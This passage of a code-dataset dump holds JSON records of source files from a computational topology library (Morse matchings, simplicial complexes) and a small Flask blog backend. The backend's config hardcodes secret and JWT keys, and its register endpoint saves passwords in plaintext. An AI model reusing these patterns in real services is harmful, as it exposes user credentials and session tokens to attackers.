< u } \n \"\"\"\n return self.descendants_.adjacencies(v)\n \n def less(self, u, v):\n \"\"\" \n Return True if u < v, False otherwise \n \"\"\"\n return u in self.ancestors(v)\n \n def maximal(self, subset):\n \"\"\" \n Return the set of elements in \"subset\" which are maximal \n \"\"\"\n return frozenset({ u for u in subset if not any ( self.less(u,v) for v in subset ) })\n \n def _repr_svg_(self):\n \"\"\"\n Return svg representation for visual display\n \"\"\"\n return graphviz.Source(self.children_.graphviz())._repr_svg_()\n\ndef LatticeOfDownsets(poset):\n \"\"\" Generate from poset the Hasse diagram of the poset of down-sets of \"poset\" ordered by inclusion \"\"\"\n lattice = Graph()\n recursion_stack = [poset.maximal(poset.vertices())]\n while recursion_stack:\n clique = recursion_stack.pop()\n for v in clique:\n parent_clique = poset.maximal(clique.difference([v]).union(poset.parents(v)))\n if parent_clique not in lattice.vertices():\n recursion_stack.append (parent_clique)\n lattice.add_edge (parent_clique,clique, str(v))\n return lattice"
},
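LatticeOfDownsets enumerates down-sets by walking maximal antichains; for intuition, the same family can also be produced by brute force on a toy poset. A standalone sketch (the three-element poset is made up):

from itertools import combinations

def downsets(elements, less):
    # A subset S is a down-set when it is closed under going downward.
    result = []
    for r in range(len(elements) + 1):
        for combo in combinations(elements, r):
            S = set(combo)
            if all(x in S for y in S for x in elements if less(x, y)):
                result.append(frozenset(S))
    return result

# Toy poset: a < b and a < c, with b and c incomparable.
order = {('a', 'b'), ('a', 'c')}
less = lambda x, y: (x, y) in order
for S in downsets(['a', 'b', 'c'], less):
    print(sorted(S))
# Prints the five down-sets: [], ['a'], ['a','b'], ['a','c'], ['a','b','c']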
{
"alpha_fraction": 0.5713991522789001,
"alphanum_fraction": 0.5784050822257996,
"avg_line_length": 27.886905670166016,
"blob_id": "25499b233a5f95c7101686ac436a0cc876e2802e",
"content_id": "deea466fd9537a1715c4a7c7dd7949b0de4c1b14",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4853,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 168,
"path": "/src/pychomp/_chomp/include/GenericMorseMatching.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// GenericMorseMatching.h\n/// Shaun Harker\n/// 2018-02-16\n/// MIT LICENSE\n\n#pragma once\n\n#include <memory>\n#include <unordered_set>\n#include <vector>\n\n#include \"Integer.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n#include \"GradedComplex.h\"\n#include \"MorseMatching.h\"\n\nclass GenericMorseMatching : public MorseMatching {\npublic:\n /// GenericMorseMatching\n GenericMorseMatching ( std::shared_ptr<Complex> complex_ptr ) {\n std::shared_ptr<GradedComplex> graded_complex_ptr (new GradedComplex(complex_ptr, [](Integer i){return 0;}));\n construct(graded_complex_ptr);\n }\n\n /// GenericMorseMatching\n // DRY mistake -- only a few lines differ. \n GenericMorseMatching ( std::shared_ptr<GradedComplex> graded_complex_ptr ) {\n construct(graded_complex_ptr);\n }\n\n /// construct\n void\n construct ( std::shared_ptr<GradedComplex> graded_complex_ptr ) {\n GradedComplex const& graded_complex = *graded_complex_ptr;\n Complex const& complex = *graded_complex.complex();\n Integer N = complex.size();\n mate_.resize(N,-1);\n priority_.resize(N);\n Integer num_processed = 0;\n std::vector<Integer> boundary_count (N);\n std::unordered_set<Integer> coreducible;\n std::unordered_set<Integer> ace_candidates;\n\n auto bd = [&](Integer x) {\n Chain result;\n auto x_val = graded_complex.value(x);\n for ( auto y : complex.boundary({x}) ) {\n auto y_val = graded_complex.value(y);\n if ( y_val > x_val ) {\n throw std::logic_error(\"graded_complex closure property failed line MorseMatching line 98\");\n }\n if ( x_val == y_val ) result += y;\n }\n return result;\n };\n\n auto cbd = [&](Integer x) {\n Chain result;\n auto x_val = graded_complex.value(x);\n for ( auto y : complex.coboundary({x}) ) {\n if ( x_val == graded_complex.value(y) ) result += y;\n }\n return result;\n };\n\n for ( auto x : complex ) {\n boundary_count[x] = bd(x).size();\n switch ( boundary_count[x] ) {\n case 0: ace_candidates.insert(x); break;\n case 1: coreducible.insert(x); break;\n }\n }\n\n auto process = [&](Integer y){\n priority_[y] = graded_complex.value(y)*complex.size() + num_processed ++;\n coreducible.erase(y);\n ace_candidates.erase(y);\n for ( auto x : cbd(y) ) {\n boundary_count[x] -= 1;\n switch ( boundary_count[x] ) {\n case 0: coreducible.erase(x); ace_candidates.insert(x); break;\n case 1: coreducible.insert(x); break;\n }\n }\n };\n\n while ( num_processed < N ) {\n if ( not coreducible.empty() ) {\n Integer K, Q;\n // Extract K\n auto it = coreducible.begin(); K = *it; coreducible.erase(it); // pop from unordered_set\n // Find mate Q\n for ( auto x : bd(K) ) if ( mate_[x] == -1 ) { Q = x; break; }\n if ( graded_complex.value(K) != graded_complex.value(Q) ) {\n throw std::logic_error(\"graded_complex error -- memory bug? 
MorseMatching line 132\");\n }\n mate_[K] = Q; mate_[Q] = K;\n process(Q); process(K);\n } else {\n Integer A;\n // Error: what if there are zero ace candidates?\n auto it = ace_candidates.begin(); A = *it; ace_candidates.erase(it); // pop from unordered_set\n mate_[A] = A;\n process(A);\n }\n }\n\n // Compute critical cells\n Integer D = complex.dimension();\n //std::cout << \" Dimension = \" << dim_ << \"\\n\";\n begin_.resize(D+2);\n Integer idx = 0;\n for ( Integer d = 0; d <= D; ++ d ) {\n begin_[d] = idx;\n //std::cout << \" begin_[\" << d << \"] = \" << *begin_[d] << \"\\n\";\n for ( auto v : complex(d) ) {\n //std::cout << \" Inspecting cell \" << v << \" with mate \" << matching_ -> mate(v) << \"\\n\";\n if ( mate(v) == v ) { \n //std::cout << \" Identified cell \" << idx << \"\\n\";\n reindex_.push_back({v, idx});\n ++idx;\n }\n }\n }\n begin_[D+1] = idx;\n\n }\n\n /// critical_cells\n std::pair<BeginType const&,ReindexType const&>\n critical_cells ( void ) const {\n return {begin_,reindex_};\n }\n\n /// mate\n Integer\n mate ( Integer x ) const { \n return mate_[x];\n }\n\n /// priority\n Integer\n priority ( Integer x ) const { \n return priority_[x];\n }\n\nprivate:\n std::vector<Integer> mate_;\n std::vector<Integer> priority_;\n BeginType begin_;\n ReindexType reindex_;\n};\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nGenericMorseMatchingBinding(py::module &m) {\n py::class_<GenericMorseMatching, std::shared_ptr<GenericMorseMatching>>(m, \"GenericMorseMatching\")\n .def(py::init<std::shared_ptr<Complex>>())\n .def(py::init<std::shared_ptr<GradedComplex>>()) \n .def(\"mate\", &GenericMorseMatching::mate)\n .def(\"priority\", &GenericMorseMatching::priority);\n}\n"
},
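Stripped of the grading and of the Complex interface, the coreduction loop in construct() fits in a few lines of Python. A sketch on a hand-built interval complex, with the boundary given as a dict of sets (made up for the example, and ignoring grades for brevity):

def coreduction_matching(boundary):
    # boundary: {cell: set of boundary cells}; returns a mate map as in the header.
    cells = set(boundary)
    coboundary = {c: set() for c in cells}
    for c, bd in boundary.items():
        for b in bd:
            coboundary[b].add(c)
    count = {c: len(boundary[c]) for c in cells}   # unprocessed boundary cells
    mate, processed = {}, set()

    def process(y):
        processed.add(y)
        for x in coboundary[y]:
            count[x] -= 1

    while len(processed) < len(cells):
        # Prefer a coreduction pair (K with exactly one free face Q); else excise an ace.
        K = next((c for c in cells - processed if count[c] == 1), None)
        if K is not None:
            Q = next(b for b in boundary[K] if b not in mate)
            mate[K], mate[Q] = Q, K
            process(Q); process(K)
        else:
            A = next(c for c in cells - processed if count[c] == 0)
            mate[A] = A
            process(A)
    return mate

# Interval complex: vertices v0, v1 and edge e with boundary {v0, v1}.
print(coreduction_matching({'v0': set(), 'v1': set(), 'e': {'v0', 'v1'}}))
# One vertex becomes a self-mated ace; the edge pairs with the other vertex.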
{
"alpha_fraction": 0.5794553756713867,
"alphanum_fraction": 0.5829024314880371,
"avg_line_length": 26.112150192260742,
"blob_id": "d35e7eb3f9d8896fa844001f22c1b503ec3bd7e8",
"content_id": "7524665ae07a60a6c0995d229a907c61afda3247",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5802,
"license_type": "permissive",
"max_line_length": 136,
"num_lines": 214,
"path": "/src/pychomp/_chomp/include/MorseComplex.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// MorseComplex.h\n/// Shaun Harker\n/// 2017-07-19\n/// MIT LICENSE\n\n#pragma once\n\n#include <memory>\n#include <queue>\n#include <tuple>\n#include <unordered_set>\n#include <vector>\n\n#include \"Integer.h\"\n#include \"Iterator.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n#include \"MorseMatching.h\"\n\nclass MorseComplex : public Complex {\npublic:\n\n\n /// MorseComplex constructor\n MorseComplex ( std::shared_ptr<Complex> arg_base, \n std::shared_ptr<MorseMatching> arg_matching ) \n : base_(arg_base), matching_(arg_matching) {\n\n auto begin_reindex = matching_ -> critical_cells();\n begin_.clear();\n for ( auto i : begin_reindex.first ) {\n begin_.push_back(Iterator(i));\n }\n dim_ = begin_.size()-2;\n auto const& reindex = begin_reindex.second;\n\n for ( auto pair : reindex ) {\n include_.push_back(pair.first);\n }\n project_ = std::unordered_map<Integer, Integer>(reindex.begin(), reindex.end());\n\n // boundary\n bd_.resize(size());\n //std::cout << \"MorseComplex. There are \" << size() << \" cells.\\n\";\n //std::cout << \"MorseComplex. Computing boundary.\\n\";\n for ( auto ace : *this ) {\n //std::cout << \" Computing boundary for cell ace ==\" << ace << \"\\n\";\n //std::cout << \" include({ace}) = \" << include({ace}) << \"\\n\";\n bd_[ace] = lower(base()->boundary(include({ace})));\n //std::cout << \" bd(ace) = \" << bd_[ace] << \"\\n\";\n }\n\n //std::cout << \"MorseComplex. Computing coboundary.\\n\";\n // coboundary\n cbd_.resize(size());\n for ( auto ace : *this ) {\n for ( auto bd_cell : bd_[ace] ) cbd_[bd_cell] += ace;\n }\n\n }\n\n /// delegating constructor\n MorseComplex ( std::shared_ptr<Complex> arg_base ) \n : MorseComplex(arg_base, MorseMatching::compute_matching(arg_base)) {\n\n }\n\n /// boundary\n virtual Chain\n boundary ( Chain const& c ) const final {\n Chain result;\n for ( auto x : c ) result += bd_[x];\n return result;\n }\n\n /// coboundary\n virtual Chain\n coboundary ( Chain const& c ) const final {\n Chain result;\n for ( auto x : c ) result += cbd_[x];\n return result;\n }\n\n /// column\n /// Apply \"callback\" method to every element in ith column of\n /// boundary matrix\n virtual void\n column ( Integer i, std::function<void(Integer)> const& callback) const final {\n for ( auto x : bd_[i] ) callback(x);\n };\n\n /// row\n /// Apply \"callback\" method to every element in ith row of\n /// boundary matrix\n virtual void\n row ( Integer i, std::function<void(Integer)> const& callback) const final {\n for ( auto x : cbd_[i] ) callback(x);\n };\n \n\n // Feature\n\n /// base\n std::shared_ptr<Complex>\n base ( void ) const {\n return base_;\n }\n\n /// matching\n std::shared_ptr<MorseMatching>\n matching ( void ) const {\n return matching_;\n }\n\n /// include\n Chain\n include ( Chain const& c ) {\n Chain result;\n for ( auto x : c ) result += include_[x];\n return result;\n }\n\n /// project\n Chain\n project ( Chain const& c ) {\n Chain result;\n for ( auto x : c ) { \n if ( project_.count(x) > 0 ) result += project_[x];\n }\n return result;\n }\n\n /// lift\n Chain\n lift ( Chain const& c ) {\n Chain included = include ( c );\n Chain canonical; Chain gamma;\n std::tie(canonical, gamma) = flow ( base () -> boundary ( included ) );\n return included + gamma;\n }\n\n /// lower\n Chain\n lower ( Chain const& c ) {\n Chain canonical; Chain gamma;\n std::tie(canonical, gamma) = flow ( c );\n return project(canonical);\n }\n\n /// flow\n std::pair<Chain, Chain>\n flow ( Chain const& input ) const {\n // std::cout << 
\"MorseComplex::flow\\n\";\n Chain canonical, gamma;\n //std::unordered_set<Integer> queens;\n auto compare = [&](Integer x, Integer y){return matching_ -> priority(x) < matching_ -> priority(y);};\n std::priority_queue<Integer, std::vector<Integer>, decltype(compare)> priority ( compare );\n auto isQueen = [&](Integer x){ return x < matching_ -> mate(x); };\n\n auto process = [&](Integer x) {\n if ( isQueen(x) ) { //&& queens.count(x) == 0) {\n //queens . insert (x);\n priority . push (x);\n }\n canonical += x;\n };\n\n for ( auto x : input ) process(x);\n\n while ( not priority . empty () ) {\n // std::cout << \" Current chain = \" << canonical << \"\\n\";\n auto queen = priority.top(); priority.pop();\n if ( canonical . count ( queen ) == 0 ) continue;\n auto king = matching_ -> mate ( queen );\n gamma += king;\n // std::cout << \" Reducing queen \" << queen << \" with king \" << king << \" and priority \" << matching_->priority(queen) << \"\\n\";\n // std::cout << \" The boundary of king is \" << base()->boundary({king})<<\"\\n\";\n base() -> column(king, process);\n //process( base()->boundary({king}) );\n }\n // std::cout << \" COMPLETE chain = \" << canonical << \"\\n\";\n\n return {canonical, gamma};\n }\n\nprivate:\n std::shared_ptr<Complex> base_;\n std::shared_ptr<MorseMatching> matching_;\n std::vector<Integer> include_;\n std::unordered_map<Integer, Integer> project_;\n std::vector<Chain> bd_;\n std::vector<Chain> cbd_;\n};\n\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nMorseComplexBinding(py::module &m) {\n py::class_<MorseComplex, std::shared_ptr<MorseComplex>, Complex>(m, \"MorseComplex\")\n .def(py::init<std::shared_ptr<Complex>, std::shared_ptr<MorseMatching>>())\n .def(py::init<std::shared_ptr<Complex>>())\n .def(\"include\", &MorseComplex::include)\n .def(\"project\", &MorseComplex::project)\n .def(\"lift\", &MorseComplex::lift)\n .def(\"lower\", &MorseComplex::lower)\n .def(\"flow\", &MorseComplex::flow)\n .def(\"base\", &MorseComplex::base)\n .def(\"matching\", &MorseComplex::matching);\n}\n"
},
{
"alpha_fraction": 0.5806451439857483,
"alphanum_fraction": 0.58588707447052,
"avg_line_length": 26.25274658203125,
"blob_id": "342717c830c576197e053222cf71711bf58f8b84",
"content_id": "3a52505ac657cf28fcf9131a373c830fe323ae76",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4960,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 182,
"path": "/src/pychomp/_chomp/include/SimplicialComplex.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// SimplicialComplex.h\n/// Shaun Harker\n/// MIT LICENSE\n/// 2018-03-09\n\n// todo: sort simplices upon construction\n\n#pragma once\n\n#include \"common.h\"\n\ntypedef std::vector<Integer> Simplex;\n\ninline std::vector<Simplex>\nsimplex_boundary(Simplex const& s) {\n //std::cout << \"bd [\"; for ( auto v : s ) std::cout << v << \", \"; std::cout << \"] = \\n\";\n std::vector<Simplex> result;\n if ( s.size() > 1 ) {\n for ( Integer i = 0; i < s.size(); ++ i ) {\n Simplex t = s;\n t.erase(t.begin() + i);\n result.push_back(t);\n //std::cout << \" [\"; for ( auto v : t ) std::cout << v << \", \"; std::cout << \"] + \\n\";\n }\n }\n return result;\n}\n\n/// SimplicialComplex\nclass SimplicialComplex : public Complex {\npublic:\n\n /// SimplicialComplex\n SimplicialComplex ( std::vector<Simplex> const& maximal_simplices );\n\n /// column\n /// Apply \"callback\" method to every element in ith column of\n /// boundary matrix\n virtual void\n column ( Integer i, std::function<void(Integer)> const& callback) const final;\n\n /// row\n /// Apply \"callback\" method to every element in ith row of\n /// boundary matrix\n virtual void\n row ( Integer i, std::function<void(Integer)> const& callback) const final;\n\n /// simplex\n /// Given a cell index, return the associated Simplex\n Simplex\n simplex ( Integer i ) const;\n\n /// idx\n /// Given a simplex object, return the associated cell index.\n /// If simplex not in complex, return -1.\n Integer\n idx ( Simplex const& s ) const;\n\nprivate:\n std::unordered_map<Simplex, Integer, pychomp::hash<Simplex>> idx_;\n std::vector<Simplex> simplices_;\n std::vector<Chain> bd_;\n std::vector<Chain> cbd_;\n \n /// add_simplex\n bool\n add_simplex ( Simplex s );\n\n /// add_closed_simplex\n void\n add_closed_simplex ( Simplex const& s );\n \n};\n\ninline SimplicialComplex::\nSimplicialComplex (std::vector<Simplex> const& max_simplices) {\n //std::cout << \"SimplicialComplex \" << max_simplices.size() << \"\\n\";\n for ( auto s : max_simplices ) add_closed_simplex ( s );\n Integer N = simplices_.size();\n std::sort(simplices_.begin(), simplices_.end(), \n []( Simplex const& lhs, Simplex const& rhs ){ \n if (lhs.size() < rhs.size()) return true; \n if (lhs.size() > rhs.size()) return false;\n return std::lexicographical_compare(lhs.begin(), lhs.end(), rhs.begin(), rhs.end());\n });\n idx_.clear();\n for ( Integer i = 0; i < N; ++ i ) idx_[simplices_[i]] = i;\n dim_ = -1;\n bd_.resize(N);\n cbd_.resize(N);\n for ( Integer i = 0; i < N; ++ i ) {\n Simplex const& s = simplices_[i];\n Integer simplex_dim = s.size() - 1;\n // std::cout << \"i = \" << i << \"\\n\";\n // std::cout << \" s = [\"; for ( auto v : s ) std::cout << v << \", \"; std::cout << \"] + \\n\";\n // std::cout << \" simplex_dim == \" << simplex_dim << \"\\n\";\n // std::cout << \" dim_ == \" << dim_ << \"\\n\";\n if ( simplex_dim > dim_ ) {\n // std::cout << \"New dimension\\n\";\n ++ dim_;\n begin_.push_back(Iterator(i));\n // std::cout << \"Pushed \" << i << \" onto begin_\\n\";\n }\n Chain c;\n for ( Simplex const& t : simplex_boundary(s) ) c += idx_[t];\n bd_[i] = c;\n //std::cout << \"boundary of \" << i << \" is equal to \" << c << \"\\n\";\n }\n begin_.push_back(Iterator(N));\n // std::cout << \"Pushed \" << N << \" onto begin_\\n\";\n\n for ( Integer i = 0; i < N; ++ i ) {\n Chain bd = bd_[i];\n for ( Integer j : bd ) {\n cbd_[j] += i;\n }\n }\n}\n\ninline Simplex SimplicialComplex::\nsimplex ( Integer i ) const{\n return simplices_[i];\n}\n\ninline Integer 
SimplicialComplex::\nidx ( Simplex const& s ) const {\n auto it = idx_.find(s);\n if ( it == idx_.end() ) return -1;\n return it -> second;\n}\n\ninline bool SimplicialComplex::\nadd_simplex (Simplex s) {\n std::sort(s.begin(), s.end());\n if ( idx(s) == -1 ) {\n idx_[s] = simplices_.size();\n simplices_.push_back(s);\n return true;\n } else {\n return false;\n }\n}\n\ninline void SimplicialComplex::\nadd_closed_simplex (Simplex const& s) {\n std::stack < Simplex > work_stack;\n work_stack.push(s);\n while ( not work_stack.empty() ) {\n auto t = work_stack.top();\n work_stack.pop();\n bool inserted = add_simplex(t);\n if ( inserted ) {\n for ( auto u : simplex_boundary(t) ) {\n work_stack.push(u);\n }\n }\n }\n}\n\ninline void SimplicialComplex::\ncolumn ( Integer i, std::function<void(Integer)> const& callback ) const { \n for ( auto x : bd_[i] ) callback(x);\n}\n\ninline void SimplicialComplex::\nrow ( Integer i, std::function<void(Integer)> const& callback ) const {\n for ( auto x : cbd_[i] ) callback(x);\n}\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nSimplicialComplexBinding(py::module &m) {\n py::class_<SimplicialComplex, std::shared_ptr<SimplicialComplex>, Complex>(m, \"SimplicialComplex\")\n .def(py::init<std::vector<Simplex> const&>())\n .def(\"simplex\", &SimplicialComplex::simplex)\n .def(\"idx\", &SimplicialComplex::idx);\n}\n"
},
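simplex_boundary above just drops one vertex at a time; its Python twin, applied to a triangle for reference:

def simplex_boundary(s):
    # All codimension-one faces of simplex s (empty for a vertex).
    if len(s) <= 1:
        return []
    return [s[:i] + s[i+1:] for i in range(len(s))]

print(simplex_boundary([0, 1, 2]))  # [[1, 2], [0, 2], [0, 1]]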
{
"alpha_fraction": 0.7019498348236084,
"alphanum_fraction": 0.7242339849472046,
"avg_line_length": 20.117647171020508,
"blob_id": "cfb0a94ec8850305762f32a56e3e223cd53e6ab0",
"content_id": "25491a4cdf024a3b13a8459745321c5cf4eebd34",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 359,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 17,
"path": "/CMakeLists.txt",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 2.8.12)\nproject(CHomP)\n\nadd_subdirectory(pybind11)\n\ninclude_directories ( \n ${CMAKE_SOURCE_DIR}/include\n /usr/local/include \n ${USER_INCLUDE_PATH} )\n\nlink_directories ( \n ${USER_LIBRARY_PATH} \n /usr/local/lib )\n\nmessage(\"USER INCLUDE PATH IS ${USER_INCLUDE_PATH}\")\n\npybind11_add_module(_chomp src/pychomp/_chomp/chomp.cpp)\n"
},
{
"alpha_fraction": 0.5917859077453613,
"alphanum_fraction": 0.6054760217666626,
"avg_line_length": 21.63380241394043,
"blob_id": "3232855d1e66a71639eb3d7c2239bdcc5b1cf166",
"content_id": "833b0cd40b7abf6b24293cfe99c49a7d4229658c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1607,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 71,
"path": "/src/pychomp/_chomp/include/GradedComplex.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// GradedComplex.h\n/// Shaun Harker\n/// 2017-07-20\n/// MIT LICENSE\n\n#pragma once\n\n#include \"Integer.h\"\n#include \"Complex.h\"\n//#include \"Poset.h\"\n\nclass GradedComplex {\npublic:\n /// GradedComplex\n GradedComplex ( std::shared_ptr<Complex> c, \n std::function<Integer(Integer)> v ) : complex_(c), value_(v) {}\n\n /// complex\n std::shared_ptr<Complex>\n complex ( void ) const {\n return complex_;\n }\n\n // /// poset\n // std::shared_ptr<Poset>\n // poset ( void ) const {\n // return poset_;\n // }\n \n /// value\n Integer\n value ( Integer i) const {\n return value_(i);\n }\n\n /// count\n std::unordered_map<Integer,std::vector<Integer>>\n count ( void ) const {\n std::unordered_map<Integer,std::vector<Integer>> result;\n auto D = complex() -> dimension ();\n for ( Integer d = 0; d <= D; ++ d ) {\n for ( Integer idx : (*complex())(d) ) {\n auto v = value(idx);\n if ( result.count(v) == 0 ) result[v] = std::vector<Integer>(D+1);\n result[v][d] += 1;\n }\n }\n return result;\n }\n\nprivate:\n std::shared_ptr<Complex> complex_;\n std::function<Integer(Integer)> value_;\n};\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\n#include <pybind11/functional.h>\n\nnamespace py = pybind11;\n\ninline void\nGradedComplexBinding(py::module &m) {\n py::class_<GradedComplex, std::shared_ptr<GradedComplex>>(m, \"GradedComplex\")\n .def(py::init<std::shared_ptr<Complex>,std::function<Integer(Integer)>>())\n .def(\"complex\", &GradedComplex::complex)\n .def(\"value\", &GradedComplex::value)\n .def(\"count\", &GradedComplex::count);\n}\n"
}
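GradedComplex::count() above only tallies cells per (grade value, dimension) pair; the same bookkeeping in Python, with made-up cells for illustration:

from collections import defaultdict

def count(cells, value, dim, D):
    # cells: iterable of cell ids; value/dim give the grade and dimension of a cell.
    result = defaultdict(lambda: [0] * (D + 1))
    for c in cells:
        result[value(c)][dim(c)] += 1
    return dict(result)

# Four cells of a 1-dimensional complex, graded into two values.
print(count(range(4), value=lambda c: c % 2, dim=lambda c: c // 2, D=1))
# {0: [1, 1], 1: [1, 1]}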
] | 38 |
akamuinsaner/memo_backend | https://github.com/akamuinsaner/memo_backend | b938a4dea5f66edcd99385a42507c587e5d7743d | 9c54ff3b7b4cfa7cbdf113fa36993f09a3582c39 | 090ff67e0d2a6419c25aaa1f91ade5849afbd446 | refs/heads/master | 2018-11-12T07:50:37.958933 | 2018-09-16T02:45:24 | 2018-09-16T02:45:24 | 124,542,052 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6501742005348206,
"alphanum_fraction": 0.6585366129875183,
"avg_line_length": 35.82051467895508,
"blob_id": "f8e5b0cbbba34b5beb62cb979c7a853ee270c087",
"content_id": "484a30eb4f4055658e3472363f0599e3df34cb11",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1435,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 39,
"path": "/app/views/user.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "from flask import request, jsonify, Blueprint\nfrom app import db\nfrom app.models import User\nfrom flask_jwt_extended import jwt_required\nfrom flask_restful import Resource, Api, reqparse, abort\nfrom app.marshmallow import UserSchema\n\nbp_user = Blueprint('user', __name__)\napi = Api(bp_user)\nuser_schema = UserSchema()\n\nclass Register(Resource):\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('username', required=True, help=\"username can't be blank\")\n parser.add_argument('password', required=True, help=\"password can't be blank\")\n args = parser.parse_args()\n username = args['username']\n password = args['password']\n exist_user = User.query.filter(User.username == username).first()\n if (exist_user):\n abort(401, message=\"username already exist\")\n if not username or not password:\n abort(400, message=\"username and password both required\")\n user = User(username = username, password = password)\n db.session.add(user)\n db.session.commit()\n return jsonify({ 'success': True })\n\nclass UserGet(Resource):\n @jwt_required\n def get(self, user_id):\n user = User.query.get(user_id)\n if not user:\n abort(404, info=\"user not exist\")\n return user_schema.dump(user).data, 200\n\napi.add_resource(Register, '/register')\napi.add_resource(UserGet, '/user/<int:user_id>')"
},
{
"alpha_fraction": 0.6680790781974792,
"alphanum_fraction": 0.6793785095214844,
"avg_line_length": 20.484848022460938,
"blob_id": "8a81cf8d7161f2c452f3bfd5468a2c1bf0251a90",
"content_id": "040d7b7ee6b6369850396394a3905be1ee23a69d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 708,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 33,
"path": "/start.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "import os\nimport click\nfrom app import create_app\nfrom config import config\n\nenv = os.getenv('FLASK_ENV')\napp = create_app(config(env))\n\[email protected]()\ndef cli():\n pass\n\[email protected]()\ndef migrate():\n os.system('flask db migrate')\n\[email protected]()\ndef upgrade():\n os.system('flask db upgrade')\n\[email protected]()\[email protected]('--host', default='0.0.0.0', help=\"define server host\")\[email protected]('--port', default=8989, help=\"define server port\")\[email protected]('--debug', default=True, help=\"define debug mode\")\ndef run(host, port, debug):\n app.run(host=host, port=port, debug=debug)\n\ncli.add_command(migrate)\ncli.add_command(upgrade)\ncli.add_command(run)\n\nif __name__ == '__main__':\n cli()"
},
{
"alpha_fraction": 0.6561480164527893,
"alphanum_fraction": 0.6626768112182617,
"avg_line_length": 27.75,
"blob_id": "cfc094f220700d49c23221d846ae04fc02576848",
"content_id": "417bbfecb409c89feadf6516b582adf63a1ded4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 919,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 32,
"path": "/config.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "import os\nfrom datetime import timedelta\nimport pymysql\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\nmysql_password = os.getenv('MYSQL_ROOT_PASSWORD')\nmysql_host = os.getenv('MYSQL_HOST')\nmysql_port = os.getenv('MYSQL_PORT')\nmysql_database = os.getenv('MYSQL_DATABASE')\n\nclass DEV_CONFIG():\n SECRET_KEY = 'wangshuai'\n DEBUG = True\n # SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'data.sqlite')\n SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:{0}@{1}:{2}/{3}'.format(\n mysql_password,\n mysql_host,\n mysql_port,\n mysql_database\n )\n SQLALCHEMY_COMMIT_ON_TEARDOWN = True\n SQLALCHEMY_COMMIT_TEARDOWN = True\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n JWT_SECRET_KEY = 'wangshuai'\n JWT_ACCESS_TOKEN_EXPIRES = timedelta(days=30)\n\n\ndef config(env = 'development'):\n configs = {\n 'development': DEV_CONFIG\n }\n return configs[env]"
},
{
"alpha_fraction": 0.597491443157196,
"alphanum_fraction": 0.597491443157196,
"avg_line_length": 26.4375,
"blob_id": "790e52840f6420a6374964a9b8155ded0a51d1b4",
"content_id": "409df229263f0169d2d79c9f07fad9428ce78f90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 877,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 32,
"path": "/app/marshmallow.py",
"repo_name": "akamuinsaner/memo_backend",
"src_encoding": "UTF-8",
"text": "from app import ma\nfrom app.models import User, Blog, Tag\n\nclass TagSchema(ma.ModelSchema):\n class Meta:\n model = Tag\n fields = ('id', 'name')\n\nclass SimpleBlogSchema(ma.ModelSchema):\n class Meta:\n model = Blog\n fields = ('id', 'user_id', 'title', 'content', 'created_at', 'updated_at')\n\nclass SimpleUserSchema(ma.ModelSchema):\n class Meta:\n model = User\n fields = ('id', 'username')\n\nclass UserSchema(ma.ModelSchema):\n class Meta:\n model = User\n fields = ('id', 'username', 'blogs')\n blogs = ma.Nested(SimpleBlogSchema, many=True)\n\nclass BlogSchema(ma.ModelSchema):\n class Meta:\n model = Blog\n fields = (\n 'id', 'user_id', 'title', 'content', 'created_at', 'updated_at', 'user', 'tags'\n )\n tags = ma.Nested(TagSchema, many=True)\n user = ma.Nested(SimpleUserSchema)"
},
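The nesting pattern above (BlogSchema embedding TagSchema and a reduced user schema) can be tried without the Flask app. A standalone sketch against plain dicts, using the marshmallow 2.x API pinned in requirements.txt; the blog data below is hypothetical:

from marshmallow import Schema, fields

class TagSchema(Schema):
    id = fields.Int()
    name = fields.Str()

class BlogSchema(Schema):
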